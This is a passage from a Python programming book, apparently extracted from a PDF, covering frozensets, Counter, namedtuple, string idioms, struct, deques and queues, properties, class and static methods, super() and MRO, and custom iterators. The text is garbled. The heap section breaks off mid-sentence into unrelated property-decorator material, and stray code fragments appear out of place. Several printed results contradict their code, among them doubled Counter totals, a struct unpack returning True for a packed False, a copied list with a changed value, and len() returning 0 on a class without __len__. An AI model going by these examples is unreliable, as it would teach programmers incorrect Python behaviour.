What if you need a set of elements that are unique and constant throughout the execution of the program? To construct a read-only set, we can make use of the frozenset class, which will prevent any modifications on the set. They are essentially static in nature and you can only query on their elements.

One benefit of frozensets is that you can use them as keys in the dictionaries, or as elements of another set, since their immutability makes them hashable. You cannot perform these operations with regular sets. However, like sets, they support all set operations and are not ordered.

>>> subjects = frozenset({'history', 'geography', 'math', 'science'})

>>> subjects.add('commerce') AttributeError: 'frozenset' object has no attribute 'add'

>>> a_dict = {frozenset({1, 2, 3, 4, 5}): 'something cool'} >>> a_dict[frozenset({1, 2, 3, 4, 5})] 'something cool'

Frozensets, being immutable, are hashable in nature; hence, we can use them as keys in a dictionary.

Using multisets or bags with collections.Counter

We are one step deeper into sets now. Now, what if we want to maintain the uniqueness of entities but at the same time, want to handle multiple instances of any element in the set to also be preserved? That is made possible by the collections.Counter class of the standard library which implements the data structure called the multiset or bag. This will be useful in cases where you want to keep track of how many times it was included in the set along with its existence in the set: In [1]: from collections import Counter pirate_loot = Counter() loot = {"gold": 12, "silver": 10} pirate_loot.update(loot) print(pirate_loot)

Counter({'gold': 24, 'silver': 20})

In [2]: another_loot = {"silver": 23, "bronze": 5} pirate_loot.update(another_loot) print(pirate_loot) Counter({'silver': 43, 'gold': 24, 'bronze': 5})

The crux of the Counter class is how we get the element counts. If you check the length of the object, it returns the number of

unique elements in the multiset object. If you want to retrieve the total number of elements, you must use the sum function.

In [3]: len(pirate_loot) 3

In [4]: sum(pirate_loot.values()) 72

Sets are most useful when it comes to the removal of duplicate elements and maintaining collection of unique elements. The features discussed here should help you get a deeper view into the uses and features of sets in Python.

Tuple tricks

The tuple is a very flexible and extremely useful data structure in Python. Similar to lists, they are also sequences. They differ from lists in the way that tuples are immutable. Although tuples are less popular than lists, they are a fundamental data type, which are even used internally in the core Python language. Despite not noticing, you are using tuples in the following situations:

Working with parameters and arguments in functions. Returning multiple items from a function.

Iterating over key-value pairs of a dictionary.

Using string formatting.

Write clearer tuples with namedtuple

When dealing with APIs for logically arranged spreadsheet-like data, most return values, especially the multi-row ones, are in the form of lists or tuples.

In such implementations, elements at a particular index represent something logical and meaningful. When dealing with larger data sets, remembering which index corresponds to which logical field is tedious and rather confusing, not to mention error prone. That is where the namedtuple from the collections module comes into play. A namedtuple is like a normal tuple that provides the added advantage of accessing the fields by names rather than indices. The collections.namedtuple enhances the readability and maintainability of the code. The named tuples will also remind you of the simple structure representation of C++, and would fit well in most of the use cases.

In [1]: from collections import namedtuple Car = namedtuple('Car' , 'color mileage') 'color mileage'.split() ['color', 'mileage']

In [2]: my_car = Car('red', 3812.4) print(my_car.color, my_car[0])

red

In [3]: color, mileage = my_car print(color, mileage)

red 3812.4

Because they are built on top of regular classes, you can even add methods to a namedtuple’s class. For example, you can extend the class like any other class and add methods and new properties to it that way.

In [4]: Car = namedtuple('Car', 'color mileage') class MyCarWithMethods(Car): def hexcolor(self ): if self.color == 'red': return '#ff0000' else: return '#000000' In [5]: c = MyCarWithMethods('red', 1234) c.hexcolor()

'#ff0000' It is evident that going from ad-hoc data types like dictionaries with a fixed format to namedtuples, helps express the developer’s

intentions more clearly. Sometimes, when we attempt this refactoring, we magically come up with a better solution for the problem in hand. Using namedtuples over unstructured tuples and dicts can also make your colleagues’ lives easier, because they make the data being passed around as “self-documenting” to some extent. Use with caution though! if age > 21: output = '{name} can drink!'.format(name=name)

Unpacking data using tuples

Python is one of the languages that support multiple assignments in a statement. It also allows ‘unpacking’ of the data using Tuples (similar to the destructuring bind for those familiar with LISP).

The regular way:

csv_file_row = ['Carle', '[email protected]', 27] name = csv_file_row[0] email = csv_file_row[1] age = csv_file_row[2] output = ("{}, {}, {} years old".format(name, mail, age))

The Pythonic way:

csv_file_row = ['Carle', '[email protected]', 27] (name, email, age) = csv_file_row output = ("{}, {}, {} years old".format(name, email, age))

Ignore tuple data with the ‘_’ placeholder

When dealing with returned function values as tuples, or assigning a tuple equal to some data, sometimes not all the fields are required or need assignment. So, instead of creating unused variables and confusing future readers, the _ can be used as a placeholder for the discarded data.

The regular way: # Using confusing unused names (name, age, temp, temp2) = get_info(person) if age > 21: output = '{name} can drink!'.format(name=name)

The Pythonic way:

# Only interesting fields are named (name, age, _, _) = get_user_info(user)

Return multiple values from functions using tuples

Sometimes, functions warrant the need to return multiple values. I have seen a good amount of Python code written by novices that twists itself into knots trying to get around the incorrect assumption that a function can only return one logical value. Now, while it is true that functions can return one value, this value can be any valid object – the most ideal of them being tuples. You will see this pattern of returning values in most places in the standard library or external packages. from collections import Counter

def collect_stats(list_of_values): average = float(sum(list_of_values) / len(list_of_values)) ptile50 = value_list[int(len(list_of_values) / 2)] mode = Counter(list_of_values).most_common(1)[0][0] return (average, ptile50, mode)

Namedtuples with advanced features with typing.NamedTuple

The typing.NamedTuple instantiates a subclass equivalent to that of collections.namedtuple. However, it adds the __field_defaults__ and __field_types__ attributes to the class. Generated object will behave in the same manner, and might add some additional feature support in your IDE. The class from the typing module provides a more natural interface. You can directly customize the type by adding a docstring or some additional methods. As before, the class will be a subclass of tuple, and instances will be instances of tuple as usual and NOT a subclass of

typing.NamedTuple is a class, it uses metaclasses and a custom __new__ to handle the annotations, and then it delegates to collections.namedtuple anyway, to build and return the type. As evident from the lowercased naming convention, collections.namedtuple is not a type/class – rather, it is a factory function – which operates by constructing a string of the code and subsequently calling exec on the string.

The generated constructor is plucked out of a namespace and included in a 3-argument invocation of the metaclass type to build and return your class. NamedTuple uses a metaclass in order to use a different metaclass to instantiate the class object. typing.NamedTuple allows an easier interface to pass defaults, which was otherwise achieved in collections.namedtuple by subclassing the generated type.

In [1]: from typing import NamedTuple class Car(NamedTuple): color: str

mileage: float automatic: bool

car1 = Car('red', 3812.4, True) print(car1) print(car1.mileage)

Car(color='red', mileage=3812.4, automatic=True) 3812.4

In [2]: # Immutable Fields car1.mileage = 23

AttributeError: can't set attribute In [3]: car1 = Car('red', 'NOT_A_FLOAT', 99) car2 = Car(color='red', mileage='NOT_A_FLOAT', automatic=99) print(car1,'\n',car2) Car(color='red', mileage='NOT_A_FLOAT', automatic=99) Car(color='red', mileage='NOT_A_FLOAT', automatic=99)

Tuples are the undervalued data structure in Python that gets unnoticed over lists, but have immense utility owing to their data aggregation function, and usage in internal constructs of the language.

Handling strings better

Strings are amongst the most popular types in Python. We can create them simply by enclosing characters in quotes. Python treats single quotes the same way as double quotes. Creating strings is as simple as assigning a value to a variable. Python does not support a character type; these are treated as strings of length one, thus also considered a substring.

Create a single string from list elements with ‘’.join”

Using the join operation to create a string out of a list of elements is faster, uses lesser memory, and is a very common practice. Note that the join method is called on the delimiter that is represented as a string. A zero length delimiter will simply concatenate the strings.

The regular list_of_str = ['Syntax Error', 'Network Error', 'File not found'] concat_string = '' for substring in list_of_str: concat_string += substring

The Pythonic way:

list_of_str = ['Syntax Error', 'Network Error', 'File not found'] concat_string = ''.join(list_of_str)

Enhance clarity by chaining string functions

Here is where fine balance comes in. If you have a few transformations to perform using string functions, it is better to chain them as a sequence, rather than using a temporary variable at every stage. This will make the code more readable and efficient. However, excessive chaining may also lead to a reduction in code readability. Therefore, it is up to the developer to judge when to batch the chainings separately. I personally follow a “triple link chain” rule for limiting the number of chaining at each step to three.

The regular way:

title_name = ' The Pythonic Way : BPB Publications' formatted_title = title_name.strip(" ") formatted_title = formatted_title.upper() formatted_title = formatted_title.replace(':', ' by')

The Pythonic way:

title_name = ' The Pythonic Way : BPB Publications' formatted_title = title_name.strip(" ") .upper() .replace(':', ' by')

Use the format function for constructing strings

Mixing or constructing strings in Python can be done in the following three ways:

Using the + operator to concatenate strings and variables.

Using the conventional string formatter, using the % operator to substitute values similar to printf in other languages. Using the format function on the string.

The first two are less expressive and suboptimal in some cases. The clearest and most idiomatic way to format strings is to use the format function. This supports passing a format string and replacing the placeholders with values. We can also use named placeholders, access attributes, have control over the string width or padding, and some other features. This results in a clean and concise approach. Although, with Python 3+, the formatted string representation could also be preferred, as discussed in the previous chapter.

The Regular way: def get_formatted_string_type_one(person): # Tedious to type and prone to conversion errors

return 'Name: ' + person.name + ', Age: ' + \ str(person.age) + ', Sex: ' + person.gender

def get_formatted_string_type_two(person): # No connection b/w the format string placeholders # and values to use. Why know the type then? # Don't these types all have __str__ functions? return 'Name: %s, Age: %i, Sex: %c' % ( person.name, person.age, person.gender)

The Pythonic way: def get_formatted_string_type_three(person): return ('Name: {person.name}, Age:{person.age}, Sex: {person.gender}'.format(person=person))

Working with ASCII codes using ord and chr

Python has two often-overlooked built-in functions, ord and chr, that are used to perform translations between a character and its ASCII character code representation.

hash_value = 0 for e in some_string: hash_value += ord(e) return hash_value Strings in Python are an important part of the language, and with the advent of Python 3, there are several improvements in the way in which strings are implemented and used in programs.

Other data structure trivia

Data structures are a way of storing and organising data, so that they can be accessed and worked with, in an efficient manner. They define the relationship between data and the operations that can be performed on the data. In this section, we will look at some of the lesser known facts about Python Data Structures.

Creating serialized C structs with struct.Struct

Remember structs in C++? The Python standard library comes with the struct.Struct class converts between Python values and C structs serialized into Python byte objects. We can use it to handle streaming network traffic or handle binary data stored in files.

It is not preferred to use serialized structs to store or manage the data objects, which are meant to be purely used inside Python code. Rather, they are intended to be used as a format for data exchange. Using serialized structs to package the primitive data is more memory efficient than other data types. However, in most cases, this would be unnecessary and an over-optimization for trivial problems.

In [1]: from struct import Struct MyStruct = Struct('i?f ') data = MyStruct.pack(23, False, 42.0) print(data)

b'\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00(B' In [2]: MyStruct.unpack(data)

(23, True, 42.0)

Attribute defaults with types.SimpleNamespace

The types.SimpleNamespace is a shortcut choice for creating data objects in Python. Added f Python 3.3 and later, it provides defaults to access its namespace, and exposes all of their keys as class attributes. All instances also include a meaningful __repr__ by default. This provides the following advantages over an empty class:

It allows you to initialize the attributes while constructing the object: sn = SimpleNamespace(a=1, b=2).

It provides a readable eval(repr(sn)) == sn.

It overrides the default comparison. Instead of comparing by it compares the attribute values instead.

The types.SimpleNamespace translates roughly to the following:

class SimpleNamespace: def __init__(self, **kwargs): self.__dict__.update(kwargs) def __repr__(self ): keys = sorted(self.__dict__) items = ("{}={!r}".format(k,

self.__dict__[k]) for k in keys) return "{}({})".format(type(self ).__name__, ", ".join(items))

def __eq__(self, other): return self.__dict__ == other.__dict__

In short, types.SimpleNamespace is just an ultra-simple class, allowing you to set, change, and delete attributes while it also provides a nice repr output string. The attributes can be added, modified, and deleted freely. I sometimes use this as an easier-toread-and-write alternative to Moreover, I subclass it to get the flexible instantiation and repr output for free. In [1]: from types import SimpleNamespace data = SimpleNamespace(a=1, b=2) print(data)

namespace(a=1, b=2) In [2]: data.c = 3 print(data)

namespace(a=1, b=2, c=3)

Implement speedy and robust stacks with collections.deque

The deque class in the Python Standard Library collections framework implements a double-ended queue, supporting the insertions and deletions from both the ends in a non-amortized O(1) time. You can use these data structures as both queues as well as stacks, given the double-ended operations. Internally, the deques in Python are implemented as doubly linked lists, maintaining consistent performance in insertion and removal operations, but falters in O(n) performance for random access of intermediary elements in a stack.

In [1]: from collections import deque stack = deque() stack.append('eat') stack.append('pray') stack.append('love') print(stack)

deque(['eat', 'pray', 'love'])

In [2]: print(stack.pop()) 'love' In [3]: print(stack.pop()) 'pray'

In [4]: print(stack.pop()) 'eat'

In [5]: stack.pop() IndexError: "pop from an empty deque"

Implement fast and robust queues with collections.deque

As discussed, the deque class implements a double-ended queue that supports adding and removing elements from either end in amortized O(1) time. In addition, since they are linked list based implementations, they can be used as both stacks and queues. Let us take a look at how a queue would be used:

In [1]: from collections import deque queue = deque() queue.append('eat') queue.append('pray') queue.append('love') print(queue)

deque(['eat', 'pray', 'love'])

In [2]: queue.popleft() 'eat'

In [3]: queue.popleft() 'pray' In [4]: queue.popleft() 'love'

In [5]: queue.popleft() IndexError: "pop from an empty deque"

Parallel compute lock semantics with queue.queue

The Queue module provides a FIFO implementation, suitable for multi-threaded programming. It can be used to pass messages or other data between the producer and the consumer threads safely. Locking is handled for the caller, so it is simple to have as many threads as you want working with the same Queue instance. A Queue’s size (number of elements) may be restricted to throttle the memory usage or processing. In [1]: from queue import Queue simpleq = Queue() simpleq.put('eat') simpleq.put('pray') simpleq.put('love') print(simple)

object at 0x1070f5b38>

In [2]: simpleq.get() 'eat'

In [3]: simpleq.get() 'pray'

In [4]: simpleq.get() 'love'

In [5]: simpleq.get_nowait() queue.Empty

In [6]: simpleq.get() # Continuousy Blocks / waits …

Parallel compute lock semantics with queue.LifoQueue

In contrast to the standard FIFO implementation of Queue, the LifoQueue uses the last-in, first-out ordering (normally associated with a stack data structure).

It provides locking semantics to support multiple concurrent producers and consumers. Besides the queue module contains several other classes that implement multi-producer/multi-consumer queues that are useful for parallel computing. Depending on your use case, the locking semantics might be helpful, or they might just incur the unneeded overhead. In such cases, you would be better off with using a list or a deque as a general-purpose stack.

In [1]: from queue import LifoQueue squeue = LifoQueue() squeue.put('eat') squeue.put('pray') squeue.put('love') print(squeue)

object at 0x0106E8F0> In [2]: print(squeue.get()) 'love'

In [3]: print(squeue.get())

'pray'

In [4]: print(squeue.get()) 'eat'

In [5]: print(squeue.get()) # This is a blocking call and will run forever

Using shared job queues using multiprocessing.Queue

The multiprocessing is a package that supports spawning processes, using an API similar to the threading module. The multiprocessing package offers both local and remote concurrency, effectively sidestepping the Global Interpreter Lock by using subprocesses instead of threads. Due to this, the multiprocessing module allows the programmer to fully leverage multiple processors on a given machine. It runs on both Unix and Windows. The multiprocessing module also introduces APIs which do not have analogs in the threading module. A prime example of this is the Pool object which offers a convenient means of parallelizing the execution of a function across multiple input values, distributing the input data across processes (data parallelism). This is a shared job queue implementation that allows the queued items to be processed in parallel by multiple concurrent workers. Process-based parallelization is popular in CPython due to the global interpreter lock that prevents some forms of parallel execution on a single interpreter process.

As a specialized queue implementation, meant for sharing data between processes, multiprocessing.Queue makes it easier to distribute the work across multiple processes in order to work around the GIL limitations. This type of queue can store and transfer any pickle-able object across the process boundaries.

In [1]: from multiprocessing import Queue multiq = Queue() multiq.put('eat') multiq.put('pray')

multiq.put('love') print(multiq)

object at 0x0158E750> In [2]: multiq.get() 'eat' In [3]: multiq.get() 'pray' In [4]: multiq.get() 'love' In [5]: multiq.get() # Continuously Blocks / waits…

Using list based binary heaps with heapq

This module provides an implementation of the heap queue algorithm, also known as the priority queue Heaps are binary trees for which every parent node has a value less than or equal to any of its children. This implementation uses arrays for which heap[k] > myObj = Demcapsulation() >>> myObj.alpha = 'Python' >>> myObj.alpha 'Accessing the value: Python has been updated!'

The property decorator is the accessory that avoids any encapsulation mistakes. It is a class that updates the implementation objectives of the ‘alpha’ class here without violating any encapsulation functionality. The ‘property’ decorator, when used to wrap around a function, transforms it into a getter. The function would be accessed as but using the property decorator, it is now behaving as a simple attribute or property of the class and can be accessed with myObj.alpha directly. Similar to the previous example, a method can be deemed as a setter method, if you use the @.setter decorator on the method. Without the setter, the property cannot be edited and will raise an AttributeError if an update is

attempted. You can achieve exceptionally clean code my making proper use of the property decorator alongside the getters and setters – leading to a quick and succinct code development.

When to use static methods?

Static methods in classes are empowered methods in the class structure that do not depend on or make use of self or cls class features. They work independently and can be run without the initialization of instances. Static methods do not have access to the states of the class. So, when and how should we use static methods?

When implementing a class, sometimes there are computational or helper methods, which are standalone formulations that can operate without any dependency on the class state. For example, the mathematical formulae, conversion methods, serialization, or archival operations. Yes, you could argue moving these functions out of the class, but it makes more sense to aggregate all the methods needed by the class in the class itself. The following is a simple example of the same:

Without using

def get_radius_from_diameter(diameter): return(diameter / 2) class CircleArea: VALUE_OF_PI = 3.141 def __init__(self, radius, color): self.radius = radius

self.color = color

@property def total_area(self ): return self.radius * VALUE_OF_PI

Here, the method to get the radius from the diameter should work even without the CircleArea class, even though it is related.

With

class CircleArea: VALUE_OF_PI = 3.141 def __init__(self, radius, color): self.radius = radius self.color = color

@property def total_area(self ): return self.radius * VALUE_OF_PI @staticmethod def get_radius_from_diameter(diameter): return (diameter / 2) When it is put into the same class, it can still be invoked directly, without using the class methods or variables, hence we make it static to show that it is related to the class.

You can house utility functions within a library, or in a class as a static function, if the function is falling under the objective of the class. A built-in example of a static method is str.maketrans() in Python 3, which was a function in the string module in Python 2.

Using classmethod decorator for state access

Unlike static methods, the class methods have to be defined with the object of the class as its first parameter. It also gives you the flexibility to create alternative constructors, other than the __init__ method. It provides the easiest mechanism of implementation of a factory pattern in Python.

Let us write a serializer class, where the input is supplied in multiple formats. In the following example, we will be serializing a Car object and return the make and model of the car. The challenge, in this case, is that we have to expose a simple API for the user to be able to input the data in the form of a file, or string, or object, or JSON message. To solve this, the factory pattern comes to mind as a suitable approach, and we will be using classmethods for implementation:

class Car: def __init__(self, car_make, car_model): self.car_make = car_make self.car_model = car_model

@classmethod def from_string_input(cls, make_and_model_str): make, model = map(str, make_and_model_str.split("")) car = cls(make, model) return car

@classmethod def from_json_input(cls, make_and_model_json): # parse make and model from json object… return car

@classmethod def from_file_input(cls, make_and_model_file):

# read file and get make and model… return car

data = Car.from_string_input("Honda City") data = Car.from_json_input(some_json_object) data = Car.from_file_input("/tmp/car_details.txt")

Note that as per PEP8, self should be used for first argument to the Instance methods and cls should be used for first argument to the class methods.

Here, the Car class is constructed with several class methods, each of which presents a simple API to any deriving class, in order to access the class state based on the input. The class methods are beneficial features when working on largescale modular projects, which need simple, easy-to-use interfaces for long-term maintainability.

Choosing between public and private Attributes

Python does not have a clearly defined or a strict concept of public and private access specifiers. However, there is a universally accepted convention to designate the functions as private – by using the dunder _ to begin the variable or method name. The variable can still be accessed; however, it is conventionally frowned upon. Using this convention is helpful, but overusing it can make the code brittle and cumbersome. Let us consider a case where we have a Car class, which has the stored as a private instance variable. To access it, we have a getter function that gives the class access to the variable.

Using _ for private names will look like the following:

class Car: def __init__(self, car_make, car_model): self._make_and_model = f "{car_make} {car_model}"

def get_make_model(self ): return self._make_and_model per = Car("Honda", "City") assert per.get_make_model() == "Honda City"

However, this is still not the ideal way of creating private variables, given that it goes against the founding constructs of the language. In addition, if there are too many private variables, it will increase the complexity of your code.

It is also recommended to use the __ (double underscore dunder) in the names in situations of inheriting from public classes where we cannot control its entities. This also helps to avoid any namemangling issues, thereby avoiding conflicts in the code.

Using ‘__’ in Inheritance of a Public Class will look like the following:

class Car: def __init__(self, car_make, car_model): self.year_of_mfg = 2010 def get_make_model(self ): return self._make_and_model class Sedan(Car): def __init__(self, car_make, car_model): super().__init__(car_make, car_model) self.__year_of_mfg = 2009

sdn = Sedan('Volkswagen', 'Polo') print(sdn.get()) # 2010 print(sdn.__year_of_mfg) # 2009

Given that Python does not enforce anything, indicating a variable or method is private, communicates to the invoking method or class that the variables should not be overridden or accessed.

Using is vs == for comparing objects

When I was growing up, a neighbour had twin boys. They had striking resemblance and looked almost identical – the same blue eyes, height, and hairstyle. Some anger issues and birthmarks aside, it was very difficult to visually tell them apart. They were different people even though they seemed the same. This situation holds for the difference between ‘equal’ and ‘identical’. Understanding this is a precursor to seeing the difference between is and == operators for comparison.

The “==” operator checks for equality. The “is” operator checks for identities.

In the preceding situation, if we were to compare the twins using the == operator, it would result in truth – both the boys are equal. However, if the is operator was used to compare the twins, it would result in a false value – the two boys are different. Hope the analogy makes things clear from a high level about the differences between the two operators. Now, let us look at some code to understand this better.

First, let us create some data to use for comparison:

>>> alpha = [10, 21, 13] >>> beta = alpha

If we print the following in the interactive shell, we do not see any difference between them:

>>> alpha [10, 21, 13]

>>> beta [10, 21, 13]

Since both are visually the same, when we use the == operator to compare them, they will result in the truth:

>>> alpha == beta True

However, it does not mean that alpha and beta are pointing to the same object internally. In this case, since we assigned them, they have the same object reference. However, what if we did not know the source of the objects? How then, do we make sure? The is operator achieves the following:

>>> alpha is beta True

Let us create a third object by copying the list that we initially created: >>> delta = list(alpha) >>> delta [11, 21, 13]

Now, this is where it gets interesting. Let us execute the same comparisons and see the results: >>> alpha == delta True This tells us that Python deems alpha and delta as equal, since they possess the same contents. However, are they actually the same underlying object?

>>> alpha is delta False

Therefore, even if they look identical, behind the scenes, they are very different objects and the is operator enforces that check. So, to summarize, the differences we notice between the two operators are as follows: The is operator evaluates to True if both operands are references to the same or identical object.

The == operator evaluates the expression to True if the operands are of the same type and have the same contents, that is, they visually look the same. Fall back to the twin analogy when in doubt, and you’ll be able to decide when to use which operator in Python for checking equality.

super() powers in Python

Python may not be purely an object-oriented language; however, it is power packed with all the ammunition you need to build your software and applications, using object-oriented design patterns. One of the ways in which this is achieved is the support for inheritance using the super() method. This method, as in all languages, lets you access the superclass’s entities from the derived class itself. The super() method returns a reference to an instance of the parent class, which you can use to call the base class’s methods. The common use case is building classes that extend the functionality of previously built classes. You will be saving time on having to rewrite the methods that are already implemented in the base class.

How to use super() effectively

A basic use case of creating a subclass from a pre-defined Python 3 class is illustrated as follows:

import logging class InfoLogger(dict): def __setitem__(self, key, value): logging.info('Settingto %r' % (key, value)) super().__setitem__(key, value) The preceding class has all the properties of the parent dict class, but we have updated the __setitem__ function to log on every updation. The super() method ensures that the work of dictionary updation of the parent class is delegated accordingly after the logging.

The super() method is better than overriding the updation logic as well, because it is a computed indirect reference. One of the advantages is that you do not need to specify the parent class with its name anywhere. So, if the parent class changes it’s behavior, all the derived classes with super() will automatically respect it. class InfoLogger(RandomMapper): # new base class def __setitem__(self, key, value): logging.info('Settingto %r' % (key, value))

super().__setitem__(key, value)

A lesser-known feature is that since the computed indirection is executed at runtime, you have the flexibility to modify the calculation and redirect to a different class.

Let us construct a logging ordered dictionary without modifying our existing classes:

class InfoLoggerOrdDict(InfoLogger, collections.OrderedDict): pass

The new class now has several different types in its ancestor tree – object and Therefore, in the preceding code calling on the __setItem__ will invoke the immediate ancestor – OrderedDict in this case. There was no alteration of the source code for Rather, a subclass was created whose only logic is to compose two existing classes and control their search order.

Search order with Method Resolution Order (MRO)

In this section, we will dig deeper into the search order in the tree of classes as the ancestors to the class. This is officially known as the Method Resolution Order or You can simply view the MRO by printing the __mro__ attribute on the class in question:

>>> import pprint >>> pprint(InfoLoggerOrdDict.__mro__) ('__main__.InfoLoggerOrdDict>, '__main__.InfoLogger>, 'collections.OrderedDict'>, 'dict'>, 'object'>)

If we want to be able to influence the search order with a custom MRO, let us first see how it is computed. The sequence follows the order – the current class, its parent classes, and the parent classes of those parents, and so on, until we reach the object, which is the root class of all classes in Python. All these sequences are ordered in nature – the child classes before the parent classes, and for multiple parent, the tuple order is followed. So, the MRO computed in the previous example is explained here, as follows:

InfoLoggerOrdDict comes before its parents, InfoLogger and OrderedDict.

InfoLogger comes before OrderedDict since InfoLoggerOrdDict.__bases__ is in that order.

InfoLogger comes before its base class which is dict.

OrderedDict comes before its base class which is dict.

dict comes before its base class which is the root object class. Linearization refers to the process of resolving these constraints. There are several research articles on this subject, but if all we want for now is to influence the order in the MRO, the following two points need to ne noted: Derived classes precede their base classes. The base classes respect the order in which they appear in the __bases__ tuple.

Super() business advice

The business of super() is to dispatch function calls to a particular class in the ancestral tree of the instance. When we want the method re-ordering to be functional, we need to design our class accordingly. Let us strategize how we can create such a class:

Method signature should match called arguments in the tree: With normal functions, this is easier to ascertain since we know the method in advance. With we usually have no idea of who the callee is during development, due to the addition of new (sub) classes in the MRO at a later stage. One option is to use fixed function signatures that have positional arguments, similar to the example in the previous section. There is a more flexible option in which we make the methods in the MRO tree of ancestors designed to take in keyword arguments and a dictionary of keyword arguments along with it. This will use only the needed arguments at every level and will pass on the remaining keyword arguments to The final call in the dictionary will leave the **kwargs empty. Let’s take the following example to illustrate this:

class Car: def __init__(self, make_n_model, **kwargs): self.make_n_model = make_n_model super().__init__(**kwargs)

class ColorCar(Car): def __init__(self, color_of_car, **kwargs):

self.color_of_car = color_of_car super().__init__(**kwargs)

my_car = ColorCar(color_of_car='silver', make_n_model='Honda City')

Ensuring existence of the target method: We have seen that the __init__ method of the object exists as the final class in the MRO chain of classes. So, any calls in the class tree to __init__ will surely call the object’s __init__ method. Therefore, the method existence is guaranteed for the __init__ method and will not raise an How about non-standard methods?

One way to handle such cases is to create a core/root class before the object call, so that we can guarantee the existence of methods in the object with its help. This is done with the help of Let us take an example extended from the previous Car class – we want to add a method call get_miles() and we need to ensure its existence in the inheritance chain. Here, in the Vehicle class, we can make use of defensive programming in order to make sure that no other get_miles() methods are masked in the chain ahead. This ensures that when a subclass derives from the chain but not from you do not have duplicate methods. class Vehicle: def get_miles(self ): # The final stop before the object assert not hasattr(super(), 'get_miles')

class Car(Vehicle): def __init__(self, make_n_model, **kwargs): self.make_n_model = make_n_model super().__init__(**kwargs) def get_miles(self ): print('Getting miles on my:', self.make_n_model) super().get_miles()

class ColorCar(Car): def __init__(self, color_of_car, **kwargs): self.color_of_car = color_of_car super().__init__(**kwargs)

def get_miles(self ): print('Getting miles on my car of color:', self.color_of_car) super().get_miles()

>>> my_car = ColorCar(color_of_car='Silver', make_n_model='Honda City') >>> my_car.get_miles() When using this paradigm, you should clearly document that any deriving classes have to inherit from the Vehicle class to ensure the MRO behaves as expected. A good analogy of this already

exists in Python, where all the new exception classes defined have to be inheriting from the BaseException class. The last thing that needs to be ensured is that the super() is invoked at every level of escalation in the MRO chain. The developers need to ensure that the super() call is added while designing the class.

The techniques that we discussed earlier will be helpful in the structuring of classes that are flexibly composed or their MRO can be re-ordered by the deriving classes. One thing to note here about the behavior of the super method is that it returns a bound method when including an instantiated object on invocation – a method that is bound to an object, and gives access to the callee method to the context of the object.

Technically, the call to super() will not return another method. Rather, the return value is a proxy object. Proxy objects help in delegation of the function calls to the appropriate class methods without explicitly creating another object for it.

Properties and attributes of objects

The object properties in Python are public in nature, and do not support any access specifiers for making them private or protected. You cannot prevent any calling object from accessing any attributes on the base object.

Python has no strict enforcing of access specifiers, but it is a community driven language with several conventions that make up for it. When you start an attribute with a double underscore, you indicate that it is meant to be private for the scope of the object. We have already discussed the different uses of underscores in Python in Chapter 1: Introduction to Pythonic In this section, we will look at some other trivia of properties and attributes.

Iterable objects and their creation

Some commonly used Python objects like lists, sets, dictionaries, or tuples not just help in storing data but also provide constructs to be iterated over the values they store. Python empowers the developer to create his or her own iterables with custom logic. This is again, where magic methods are of use.

So, how does the iteration protocol in Python work? When you execute a loop like “for element in elements”, the interpreter verifies the following:

Whether the object has the __iter__ or __next__ iterator methods.

Whether the sequence object being iterated on has the __getitem__ or __len__ methods.

Sequences can be iterated over and the preceding mechanisms can enable this behavior. When an iteration is expected, the interpreter will call the iter() method over the object. This function in turn will invoke the __iter__ method which will be run if present. Let us take a look at this with the help of the following example: from datetime import timedelta class IterateOverDateRange: def __init__(self, first_dt, last_dt):

self.first_dt = first_dt self.last_dt = last_dt self._current_dt = first_dt

def __iter__(self ): return self

def __next__(self ): if self._current_dt>= self.last_dt:

raise StopIteration current_dt = self._current_dt self._current_dt += timedelta(days=1) return current_dt The preceding example should be iterating over a range of dates and return the values between a start and an end date. It can be used as follows:

>>> for day in IterateOverDateRange( date(2020, 10, 11), date(2020, 10, 17)): … print(day) … 2020-10-11 2020-10-12 2020-10-13 2020-10-14 2020-10-15 2020-10-16 >>>

When you start with the preceding iteration, Python makes a call to the iter() function that invokes We have configured it to return self which means that the result is again an iterable, so the control is transferred to the __next__ function. The __next__ method will decide or house the logic to decide which are the subsequent elements that need to be returned. When we are out of values, it will raise a StopIteration exception. In the above example, the loop will run fine, but when we are out of values in the range, an exception will be raised. It can therefore be used in code only once.

>>> myRange = IterateOverDateRange(date(2020, 10, 11), date(2020, 10, 17))

>>> ", ".join(map(str, myRange)) '2020-10-11, 2020-10-12, 2020-10-13, 2020-10-14, 2020-10-15, 202010-16' >>>len(myRange) 0

>>> max(myRange) Traceback (most recent call last): File "", line 1, in ValueError: max() arg is an empty sequence The secret lies in the line where we returned self from the __iter__ method.

Alternatively, what can be done is on invocation, we can make __init__ return a new instance of the iterator. The following is an example of how we can accomplish this with the help of a generator being created each time:

class IterateOverDateRange: def __init__(self, first_dt, last_dt): self.first_dt = first_dt self.last_dt = last_dt

def __iter__(self ): present_dt = self.first_dt while present_dt < self.last_dt: yield present_dt present_dt += timedelta(days=1)

Executing it again seems to get the job done. >>> myRange = IterateOverDateRange( date(2020, 10, 11), date(2020, 10, 17) )

>>> ", ".join(map(str, myRange)) '2020-10-11, 2020-10-12, 2020-10-13, 2020-10-14, 2020-10-15, 202010-16' >>> len(myRange) 6

>>> max(myRange) datetime.date(2020, 10, 16) In the preceding iterable, every time the looping is required, the __iter__ function is invoked and the generator object is reinitialized. This is an example of a container

Sequence creation

For another alternative to create an iterable, without the implementation of the __iter__() method, we look at how sequences are created. When the __iter__ is not found, the interpreter looks for the next best thing – the __getitem__() method. If this method is also not present, then the interpreter will raise a TypeError exception.

To define a sequence, Python warrants the implementation of the __getitem__ and __len__ methods. A sequence also expects the elements to start at index zero, and the iterable should return the elements it contains individually in that order.

In the earlier example, we saw for iterating over dates, it had a very low footprint for memory. This is because everytime, we generated the next element, we computed the value on demand.

The drawback of this approach is that if you wanted to access a value somewhere along the way, you have to iterate from the beginning to that point, thereby, increasing the CPU usage and the time taken considerably. This is a classic trade-off problem.

In Python, we can solve this by using the sequence generation. A sequence will compute and store the values in memory and will enable iteration as well as random access in a much lesser time [O(1) for accessing elements]. It will only use a little more memory than the previous case. Let’s see how that implementation looks, which is shown as follows:

from datetime import date, timedelta class IterateOverDateRange: def __init__(self, first_dt, last_dt): self.first_dt = first_dt self.last_dt = last_dt self._rangeValues = self._get_range_values()

def _get_range_values(self ): date_list = [] present_dt = self.first_dt while present_dt < self.last_dt: date_list.append(present_dt) present_dt += timedelta(days=1) return date_list def __len__(self ): return len(self._rangeValues)

def __getitem__(self, date_num): return self._rangeValues[date_num]

